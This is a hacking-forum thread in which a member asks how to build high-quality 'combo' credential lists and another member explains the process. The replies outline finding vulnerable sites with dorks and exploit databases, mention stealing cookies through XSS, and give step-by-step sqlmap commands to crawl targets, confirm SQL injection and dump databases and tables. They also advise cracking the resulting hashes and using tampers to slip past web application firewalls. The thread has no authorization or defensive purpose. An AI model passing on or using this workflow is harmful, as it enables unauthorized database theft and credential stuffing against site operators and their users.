Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 2859

help me make HQ combos

by Psycopathz - 28 April, 2024 - 06:00 AM
This post is by a banned member (Psycopathz) - Unhide
664
Posts
99
Threads
#1
someone tell me how to make UHQ combos either here or by discord, cxlvxn. or telegram Flez.ccp

plssssss
                                               [Image: 6cemrbF.gif]                                                




 

 
Selling Signature Spot Dm me on discord cxlvxn.
                                                            
This post is by a banned member (Psycopathz) - Unhide
664
Posts
99
Threads
Bumped #2
This is a bump
This post is by a banned member (Psycopathz) - Unhide
664
Posts
99
Threads
Bumped #3
This is a bump
This post is by a banned member (UberFuck) - Unhide
UberFuck  
Godlike
1.557
Posts
375
Threads
5 Years of service
#4
1) Find vulnerable websites -> https://www.exploit-db.com | https://www.dorksearch.com
2) Dump databases -> https://sqlmap.org
3) Crack passwords -> https://hashcat.net

There are other tools and resources, but the idea is the same: find and exploit vulnerabilities, dump creds, crack hashes. It's not always straightforward...for example you might find a XSS vulnerability that can be used to steal cookies giving you access to an admin panel, which can then be used to modify a page with a SQL injection vulnerability. Unfortunately, most skids just repost what they've found or bought somewhere else with no knowledge of how it was actually obtained.
This post is by a banned member (Psycopathz) - Unhide
664
Posts
99
Threads
#5
(05 May, 2024 - 08:38 PM)UberFuck Wrote: Show More
1) Find vulnerable websites -> https://www.exploit-db.com | https://www.dorksearch.com
2) Dump databases -> https://sqlmap.org
3) Crack passwords -> https://hashcat.net

There are other tools and resources, but the idea is the same: find and exploit vulnerabilities, dump creds, crack hashes. It's not always straightforward...for example you might find a XSS vulnerability that can be used to steal cookies giving you access to an admin panel, which can then be used to modify a page with a SQL injection vulnerability. Unfortunately, most skids just repost what they've found or bought somewhere else with no knowledge of how it was actually obtained.

Hey, thanks so much for the reply! do you have any account that I could contact you by like Discord, Telegram.
                                               [Image: 6cemrbF.gif]                                                




 

 
Selling Signature Spot Dm me on discord cxlvxn.
                                                            
This post is by a banned member (UberFuck) - Unhide
UberFuck  
Godlike
1.557
Posts
375
Threads
5 Years of service
#6
(07 May, 2024 - 11:18 PM)Psycopathz Wrote: Show More
Hey, thanks so much for the reply! do you have any account that I could contact you by like Discord, Telegram.

No, but you can DM me on here if you have any questions.
This post is by a banned member (Psycopathz) - Unhide
664
Posts
99
Threads
Bumped #7
(This post was last modified: 07 May, 2024 - 11:42 PM by Psycopathz.)
This is a bump

(07 May, 2024 - 11:27 PM)UberFuck Wrote: Show More
(07 May, 2024 - 11:18 PM)Psycopathz Wrote: Show More
Hey, thanks so much for the reply! do you have any account that I could contact you by like Discord, Telegram.

No, but you can DM me on here if you have any questions.

Well I had a question about the dumper,  Idk what to do there is so many settings and not much information in the website to fill what out. and there is many methods dk which 1 to do.
This post is by a banned member (UberFuck) - Unhide
UberFuck  
Godlike
1.557
Posts
375
Threads
5 Years of service
#8
(07 May, 2024 - 11:40 PM)Psycopathz Wrote: Show More
Well I had a question about the dumper,  Idk what to do there is so many settings and not much information in the website to fill what out. and there is many methods dk which 1 to do.

The basics...

If you want to crawl a site to find a SQL injection vulnerability:
sqlmap -u "https://targetsite.com/" --host "targetsite.com" --random-agent --crawl=2 --batch --forms --threads=10 --level=3 --risk=2

If you are targeting a specific parameter w/ get request:
sqlmap -u "http://api.targetsite.com/endpoint?param=val" --host "targetsite.com" --random-agent -p param

When the injection vulnerability is confirmed, sqlmap will create a profile for the url and injection point. Just repeat the last command and add parameters for exploring the db, then dumping.

Names of available databases:
sqlmap -u "http://api.targetsite.com/endpoint?param=val" --host "targetsite.com" --random-agent -p param --dbs

Tables in a database:
sqlmap -u "http://api.targetsite.com/endpoint?param=val" --host "targetsite.com" --random-agent -p param -D dbname --tables

Dump a database table:
sqlmap -u "http://api.targetsite.com/endpoint?param=val" --host "targetsite.com" --random-agent -p param -D dbname -T tablename --dump

If you already know the type of database, using the dbms parameter will improve results. I generally use the dump-format parameter with SQLite as the output - commas in fields fuck with CSV output and it's much easier to explore the data at a later time with SQLite.

I'd recommend keeping the sqlmap wiki page bookmarked as a reference. You'll also want to learn about and experiment with different tampers to get around WAF's - you can use more than one at a time.
It takes practice to just get decent using the tool, but it does a much better job than most SQL injection scanners and dumping tools.

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)